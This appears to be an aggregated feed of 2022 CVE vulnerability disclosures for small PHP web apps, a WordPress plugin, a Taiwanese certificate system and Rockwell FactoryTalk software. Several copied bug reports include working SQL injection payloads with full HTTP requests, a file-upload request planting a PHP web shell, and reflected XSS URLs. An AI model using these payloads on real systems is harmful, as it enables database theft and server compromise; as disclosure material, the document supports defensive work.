A vulnerability classified as critical was found in SourceCodester Cashier Queuing System 1.0. This vulnerability affects unknown code of the file /queuing/login.php of the component Login Page. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-211186 is the identifier assigned to this vulnerability.

CVE-2022-3579

A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file edituser.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211193 was assigned to this vulnerability.

CVE-2022-3584

A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument business leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-211192.

CVE-2022-3583

RAVA certificate validation system has insufficient validation for user input. An unauthenticated remote attacker can inject arbitrary SQL command to access, modify and delete database.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202209012

CVE ID

CVE-2022-39056

CVSS

9.8 (Critical)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

影響產品

全景軟體 RAVA憑證驗證系統網站 v3

問題描述

RAVA憑證驗證系統網站特定功能參數未對使用者輸入進行驗證，遠端攻擊者不須權限，即可注入任意SQL語法讀取、修改及刪除資料庫。

解決方法

請與全景軟體聯繫提供修補方案

漏洞通報者

Amos Tsai蔡啟仁 (Acer Cyber Security Inc., ACSI)

公開日期

2022-10-18

CVE-2022-39056: 全景軟體 RAVA憑證驗證系統網站 - SQL Injection

Rockwell Automation FactoryTalk VantagePoint versions 8.0, 8.10, 8.20, 8.30, 8.31 are vulnerable to an improper access control vulnerability. The FactoryTalk VantagePoint SQL Server account could allow a malicious user with read-only privileges to execute SQL statements in the back-end database. If successfully exploited, this could allow the attacker to execute arbitrary code and gain access to restricted data.

Summary

Factory Talk VantagePoint Software Broken Access Control and Input Validation Vulnerability

Revision History

Version 1.0 – October 06,2022

Executive Summary

Rockwell Automation is aware of a broken access control and input validation vulnerability. If exploited, this vulnerability could potentially lead to a high impact on the confidentiality, a low impact on the integrity, and the availability of FactoryTalk® VantagePoint® software. 

Customers using affected versions of this software are encouraged to evaluate the following mitigations and apply them where appropriate. Additional details relating to the discovered vulnerability, including the products in scope, impact, and recommended countermeasures, are provided. We have not received any notice of this vulnerability being exploited in Rockwell Automation products.

Affected Products

FactoryTalk VantagePoint software v. 8.0, 8.10, 8.20, 8.30, 8.31

Vulnerability Details

**CVE 2022-38743 FactoryTalk VantagePoint Software Broken Access Control Vulnerability** 

As a part of our commitment to security, Rockwell Automation performs routine testing and vulnerability scanning to maintain the security posture of products. Due to penetration testing, we discovered a broken access control vulnerability. The FactoryTalk VantagePoint SQLServer account could allow a malicious user with read-only privileges to execute SQL statements in the back-end database. 

CVE 2022-38743  
CVSS Base Score:  9.9/10 (Critical)    
CVSS:3.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CVE 2022-3158 FactoryTalk VantagePoint Software Input Validation Vulnerability** 

Additionally, the device lacks input validation when users enter SQL statements to retrieve information from the back-end database. This vulnerability could potentially allow a user with basic user privileges to perform remote code execution on the server. 

CVE 2022-3158  
CVSS Base Score:  9.9/10 (Critical)    
CVSS:3.1 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are encouraged to apply the following configurable risk mitigations to help reduce the risk associated with this vulnerability. We also recommend customers combine risk mitigations with security best practices to employ a defense in depth approach.

 **Additional Links**

*   CVE-2022-38743
*   CVE 2022 -3158

CVE-2022-38743: Factory Talk VantagePoint Software Broken Access Control and Input Validation Vulnerability

Open Source SACCO Management System v1.0 is vulnerable to SQL Injection via /sacco_shield/manage_payment.php.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: XD201-MENG@QI

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/manage\_payment.php

Vulnerability location: /sacco\_shield/manage\_payment.php?id=, id

dbname = sacco,length=5

\[+\] Payload: /sacco\_shield/manage\_payment.php?id=2%20and%20length(database())%20=5--+ // Leak place ---> id

GET /sacco\_shield/manage\_payment.php?id\=2%20and%20length(database())%20\=5\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

length=5 

length=6

CVE-2022-42143: bug_report/SQLi-1.md at main · xd201qaz/bug_report

Online Tours & Travels Management System v1.0 is vulnerable to Arbitrary code execution via ip/tour/admin/operations/update_settings.php.

Permalink

Cannot retrieve contributors at this time

**Online Tours & Travels Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: XD201-MENG@QI

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

Vulnerability url: ip/tour/admin/operations/update\_settings.php

Loophole location: Online Tours & Travels management system's admin/settings.php file exists arbitrary file upload (RCE)

Request package for file upload:

POST /tour/admin/operations/update\_settings.php?id\=2 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/tour/admin/settings.php
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------248921847826758
Content-Length: 1288
\-----------------------------248921847826758
Content-Disposition: form-data; name="title"
Tours and Travels
\-----------------------------248921847826758
Content-Disposition: form-data; name="f\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img"
favi.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="logo\_image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img1"
logo\_by NB.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="login\_image"; filename=""
Content-Type: application/octet-stream
\-----------------------------248921847826758
Content-Disposition: form-data; name="old\_img2"
logo\_by NB.png
\-----------------------------248921847826758
Content-Disposition: form-data; name="currency"
1
\-----------------------------248921847826758
Content-Disposition: form-data; name="footer"
Nikhil B
\-----------------------------248921847826758
Content-Disposition: form-data; name="update"
\-----------------------------248921847826758--

The files will be uploaded to this directory \\tour\\admin\\settings 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-42142: bug_report/RCE-1.md at main · xd201qaz/bug_report

Chamilo 1.11.16 is affected by an authenticated local file inclusion vulnerability which allows authenticated users with access to 'big file uploads' to copy/move files from anywhere in the file system into the web directory.

CVE-2022-42029: Security issues - Chamilo LMS

WordPress Photo Gallery plugin version 1.8.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : wordpress.org/plugins/                                                     ││  Vendor   : Photo Gallery Team - wpsofts.com                                           ││  Software : WordPress Photo Gallery 1.8.0                                              ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘URL parameter 'pg' is vulnerable to XSSPath: /photo-gallery/https://wpsofts.com/grid-kit-demo/photo-gallery/?pid=47&pg=2&zdifv%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eh18n1=1URL parameter 'pid' is vulnerable to XSSPath: /photo-gallery/https://wpsofts.com/grid-kit-demo/photo-gallery/?pida2sg4%27%2dalert%281%29%2d%27z632u&pg=2[-] Done

WordPress Photo Gallery 1.8.0 Cross Site Scripting

Billing System Project v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /phpinventory/editbrand.php.

Permalink

**Billing System Project v1.0 by mayuri\_k has SQL injection**

BUG\_Author: AuriGe

Login account: mayurik/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /phpinventory/editbrand.php?id=

Vulnerability location: /phpinventory/editbrand.php?id=, id

dbname = store1,length=6

\[+\] Payload: /phpinventory/editbrand.php?id=-1%27%20union%20select%201,database(),3,4--+ // Leak place ---> id

GET /phpinventory/editbrand.php?id\=\-1%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

Tag

#sql